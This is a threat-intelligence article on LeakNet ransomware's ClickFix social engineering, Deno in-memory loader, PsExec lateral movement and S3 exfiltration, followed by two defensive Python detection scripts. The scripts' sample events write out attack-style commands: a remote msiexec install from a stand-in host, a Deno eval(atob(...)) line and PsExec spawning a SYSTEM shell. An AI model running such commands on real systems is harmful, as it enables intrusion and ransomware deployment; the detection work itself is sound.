LeakNet redefines Ransomware with ClickFix: Social Engineering, Deno and Memory Execution

Published · 5 min read

In recent months we have seen some ransomware gangs move away from well-known tactics toward subtler, social-engineering-driven methods. One of the most striking examples is LeakNet, an operation that surfaced in late 2024 and is now changing the way it gets into networks: instead of relying so heavily on stolen credentials bought on the black market, it uses tricks that lead the victim to run commands with their own hands.

The centerpiece of LeakNet's new approach is a technique known as ClickFix. In essence, the attackers compromise legitimate websites and use them to display fake controls, for example CAPTCHA-style verification prompts, that persuade the user to copy a command and paste it into the Windows Run dialog. That command typically invokes msiexec.exe to launch a seemingly harmless installer, but in practice it kicks off a malware loading chain. The trick is attractive for two reasons: it exploits the trust users place in legitimate pages, and it sidesteps much of the network signalling that would flag traffic to attacker-owned infrastructure. ReliaQuest documents this shift, and its analysis is recommended reading for anyone who wants to dig into the technique (ReliaQuest report).


Another key piece of the puzzle is a loader built on Deno, the modern runtime for JavaScript and TypeScript. Rather than leaving visible files on disk, this loader executes Base64-encoded code directly in memory, contacts external servers to download later stages, and enters a polling loop that lets it receive new instructions without leaving much persistent evidence behind. For background on Deno and why attackers find it useful as a runtime they bring along themselves, the official site offers documentation and technical details (deno.land).

This approach fits a broader strategy: by cutting out the intermediaries who sell initial access, LeakNet lowers its cost per victim and increases its ability to scale. And because delivery comes from trusted but compromised sites, defenses that rely on domain reputation or on known network patterns have less room to spot the intrusion in time. WatchGuard and other trackers have kept records on LeakNet since it appeared in November 2024 (WatchGuard profile).

Once the actor manages to run its code, the post-compromise chain that ReliaQuest describes tends to repeat itself: the loader starts a malicious DLL via DLL side-loading, legitimate tools such as PsExec are used to move laterally across the network, active credentials and Kerberos tickets are enumerated with commands like klist to speed up access to existing services, and finally data is exfiltrated and systems are encrypted. Microsoft's documentation on PsExec and its legitimate uses helps explain why the tool is attractive to attackers (PsExec documentation), and Microsoft likewise documents the klist command used to inspect cached tickets (klist in Microsoft documentation).

Exfiltration also deserves particular attention: rather than using obviously malicious channels, LeakNet has been observed using S3 buckets to store stolen data, taking advantage of the fact that traffic to cloud services usually looks legitimate and therefore goes unnoticed. Logging and monitoring best practices for Amazon S3 are therefore an important defensive factor (Amazon S3 guide).
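One concrete way to act on the exfiltration point above is to stop treating "traffic to amazonaws.com" as uniformly benign and instead resolve which bucket each upload goes to, then compare that against the buckets the organisation actually owns. The script below is an added example written for this article; it is not code from ReliaQuest, LeakNet or any vendor. It assumes egress proxy logs that record the source host, the originating process, the HTTP method, the full URL and the bytes sent (the log format, the field order, the bucket allowlist and every log line are constructed for illustration). The bucket extraction handles both S3 URL styles (virtual-hosted `bucket.s3[.region].amazonaws.com` and path-style `s3[.region].amazonaws.com/bucket/key`), which is the part a naive "contains amazonaws.com" rule gets wrong.

```python
"""Flag large uploads to S3 buckets outside the organisation's inventory.

Added example (not from the article's sources). Assumes proxy log lines of the form:
  <timestamp> <host> <process> <METHOD> <url> <bytes_out>
"""
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import urlsplit

# Virtual-hosted style: <bucket>.s3.amazonaws.com, <bucket>.s3.<region>.amazonaws.com,
# and the legacy dashed form <bucket>.s3-<region>.amazonaws.com.
VHOST = re.compile(r"^(?P<bucket>[a-z0-9.-]+)\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$", re.I)
# Path style: s3.amazonaws.com/<bucket>/... or s3.<region>.amazonaws.com/<bucket>/...
PATH_STYLE = re.compile(r"^s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$", re.I)

# Constructed log format; real proxies (Squid, Zscaler, etc.) differ, adjust the regex.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<bytes>\d+)$"
)


def s3_bucket(url: str) -> str | None:
    """Return the bucket name an S3 URL addresses, or None if the URL is not S3."""
    parts = urlsplit(url)
    host = parts.hostname or ""  # .hostname is already lowercased
    m = VHOST.match(host)
    if m:
        return m.group("bucket")
    if PATH_STYLE.match(host):
        first_segment = parts.path.lstrip("/").split("/", 1)[0]
        return first_segment or None
    return None


def parse_line(line: str) -> dict | None:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = int(rec["bytes"])
    return rec


def find_exfil(lines: list[str], known_buckets: set[str],
               threshold_bytes: int = 100 * 1024 * 1024) -> list[tuple[str, str, str, int]]:
    """Sum upload bytes per (host, process, bucket) for PUT/POST requests to S3 and
    return the tuples whose bucket is not in the inventory and whose total exceeds
    the threshold, sorted for stable output."""
    totals: dict[tuple[str, str, str], int] = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] not in {"PUT", "POST"}:
            continue
        bucket = s3_bucket(rec["url"])
        if bucket is None:
            continue
        totals[(rec["host"], rec["proc"], bucket)] += rec["bytes"]
    return sorted((h, p, b, n) for (h, p, b), n in totals.items()
                  if b not in known_buckets and n >= threshold_bytes)


# Constructed sample: one host pushing ~140 MiB from deno.exe to an unknown bucket via both
# URL styles, a sanctioned backup agent writing to a known bucket, a download, and a tiny upload.
KNOWN_BUCKETS = {"corp-backups"}
SAMPLE_LOG = [
    "2025-03-04T10:15:02Z ws01 deno.exe PUT https://stg-7f3a.s3.eu-west-1.amazonaws.com/ws01/part1.zip 83886080",
    "2025-03-04T10:16:40Z ws01 deno.exe PUT https://s3.eu-west-1.amazonaws.com/stg-7f3a/ws01/part2.zip 62914560",
    "2025-03-04T10:17:00Z ws03 backupagent.exe PUT https://corp-backups.s3.amazonaws.com/ws03/full.tar 524288000",
    "2025-03-04T10:18:11Z ws01 chrome.exe GET https://public-assets.s3.amazonaws.com/logo.png 20480",
    "2025-03-04T10:19:05Z ws02 deno.exe PUT https://stg-7f3a.s3.amazonaws.com/ws02/a.zip 1048576",
]

if __name__ == "__main__":
    for host, proc, bucket, total in find_exfil(SAMPLE_LOG, KNOWN_BUCKETS):
        print(f"{host} {proc} -> s3://{bucket}: {total / 2**20:.1f} MiB uploaded")
```

The threshold and allowlist are the knobs to tune: a low threshold on a host where Deno or another unexpected runtime is the uploading process is a stronger signal than raw volume from a sanctioned backup agent, so feeding the process name into the score rather than only the byte count is the natural next step.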

Not every intrusion that threat intelligence teams describe follows the ClickFix script exactly: ReliaQuest also recorded attempts in which the attackers used phishing over Microsoft Teams to trick employees into running a chain of payloads that, once again, ended in a Deno-based loader. This variety suggests two possibilities: either LeakNet has deliberately broadened its repertoire of entry vectors, or the BYOR technique (bring your own runtime) is being adopted by other groups. Whoever is behind it, the result matches more general observations about the ransomware landscape: according to Google Threat Intelligence Group, exploitation of vulnerabilities in VPNs and firewalls remains a frequent cause of initial access, and data theft in ransomware incidents is on the rise (Google report).


For defenders, the good news is that this set of tactics is not undetectable: the LeakNet operation follows a fairly consistent post-compromise sequence, which opens concrete windows for detection and response before mass encryption begins. Monitoring for unusual processes that launch msiexec.exe from interactive or web contexts, identifying Deno instances running suspicious code, watching lateral movement with PsExec, and looking for anomalous access to or uploads into S3 buckets are all measures that can make a difference. User education also remains a critical line of defense: people should not paste commands that a web page tells them to run, even when the page looks verified.
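The detection opportunities listed above, and the chain described earlier (msiexec.exe launched from the Run dialog with a remote package, a Deno process evaluating Base64-encoded code, klist and PsExec afterwards), can be turned into a small correlation rule over process-creation telemetry. The script below is an added example written for this article, not code from ReliaQuest or any EDR vendor. It assumes Sysmon Event ID 1 or equivalent EDR fields (image path, command line, parent image path) already normalised into simple records; the field names, the stage labels and all sample events are constructed. Two facts it relies on: msiexec accepts an `http(s)://` URL as the package path to `/i`, and commands typed into the Windows Run dialog are spawned by explorer.exe.

```python
"""Correlate LeakNet-style ClickFix chain stages in process-creation events.

Added example (not from the article's sources). Field layout, stage names and the
sample events are constructed; the rules are written against Sysmon-like data.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Event:
    host: str
    image: str    # full path of the created process
    cmdline: str
    parent: str   # full path of the parent process


# Stage 1: msiexec installing a package fetched over HTTP(S) (what a pasted ClickFix
# command does). Run-dialog children have explorer.exe as parent; browsers cover variants
# where the page launches it directly.
MSIEXEC_REMOTE = re.compile(r"(?:/|-)i\s+\"?https?://", re.I)
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Stage 2: Deno evaluating inline code that carries a long Base64 blob or decodes one.
DENO_INLINE = re.compile(r"\b(?:eval|run)\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
# Stage 3/4: ticket enumeration and PsExec (client binaries and the service it drops).
KLIST = re.compile(r"\bklist\b", re.I)
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> list[str]:
    """Return the chain stages a single event matches (possibly none)."""
    img, par, cmd = basename(ev.image), basename(ev.parent), ev.cmdline
    hits: list[str] = []
    if img == "msiexec.exe" and par in INTERACTIVE_PARENTS and MSIEXEC_REMOTE.search(cmd):
        hits.append("clickfix_msiexec_remote_package")
    if img == "deno.exe" and DENO_INLINE.search(cmd) and (B64_BLOB.search(cmd) or "atob(" in cmd):
        hits.append("deno_inline_base64_loader")
    if img == "klist.exe" or KLIST.search(cmd):
        hits.append("kerberos_ticket_enumeration")
    if img in PSEXEC_IMAGES:
        hits.append("psexec_lateral_movement")
    return hits


def stages_per_host(events: list[Event]) -> dict[str, list[str]]:
    """Distinct stages seen on each host, in first-seen order (hosts with none are omitted)."""
    seen: dict[str, list[str]] = {}
    for ev in events:
        for stage in classify(ev):
            stages = seen.setdefault(ev.host, [])
            if stage not in stages:
                stages.append(stage)
    return seen


def escalate(events: list[Event], min_stages: int = 2) -> list[str]:
    """Hosts where at least min_stages distinct stages co-occur: an active intrusion,
    not one odd process. A lone klist or a single remote MSI stays a low-priority alert."""
    return sorted(h for h, s in stages_per_host(events).items() if len(s) >= min_stages)


B64 = "QUFB" * 20  # constructed placeholder blob, not a real payload
SAMPLE_EVENTS = [
    Event("WS01", r"C:\Windows\System32\msiexec.exe",
          r'msiexec.exe /i "https://cdn.example.invalid/verify.msi" /qn', r"C:\Windows\explorer.exe"),
    Event("WS01", r"C:\Users\alice\AppData\Local\deno\deno.exe",
          f"deno.exe eval \"eval(atob('{B64}'))\"", r"C:\Windows\System32\msiexec.exe"),
    Event("WS01", r"C:\Windows\System32\cmd.exe", "cmd.exe /c klist",
          r"C:\Users\alice\AppData\Local\deno\deno.exe"),
    Event("WS01", r"C:\Tools\PsExec.exe", r"PsExec.exe \\SRV02 -s cmd.exe", r"C:\Windows\System32\cmd.exe"),
    # Benign: a local MSI install and an ordinary Deno project run from an editor.
    Event("WS02", r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Temp\7zip.msi /qn",
          r"C:\Windows\explorer.exe"),
    Event("WS02", r"C:\Users\bob\.deno\bin\deno.exe", "deno.exe run --allow-net main.ts",
          r"C:\Users\bob\AppData\Local\Programs\Microsoft VS Code\Code.exe"),
]

if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(stages))
    print("escalate:", escalate(SAMPLE_EVENTS))
```

The value is in the correlation step rather than in any single rule: each stage on its own (a developer running Deno, an admin using PsExec, a remote MSI from a software portal) has a benign explanation, while two or more of them on the same workstation within a short window rarely does. Add a time window around `stages_per_host` when running this over more than a handful of events.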

On a broader level, the ransomware ecosystem shows conflicting tensions: on one hand, the resilience of these operations and their constant adaptation; on the other, signs that the aggregate profitability of the ransom business may be falling, which pushes some actors to change targets or tactics to maximise volume or efficiency. Recent market analyses and incident response reports discuss these dynamics and their effect on extortion trends (Coveware analysis).

If there is a practical conclusion, it is that defenses need to adapt to this mix of sophisticated social engineering and legitimate tools repurposed for hostile ends. LeakNet's shift to ClickFix and Deno-based in-memory execution is a reminder that security is both technical and human: hardening configurations, patching exposed infrastructure, segmenting networks, auditing and alerting on abnormal behaviour in runtimes and cloud services, and keeping people informed about deception tactics should all be priorities. Those who want more technical detail and evidence from attacks will find that the ReliaQuest and Drago reports offer maps and examples that help in understanding the threat in depth (Drago analysis).
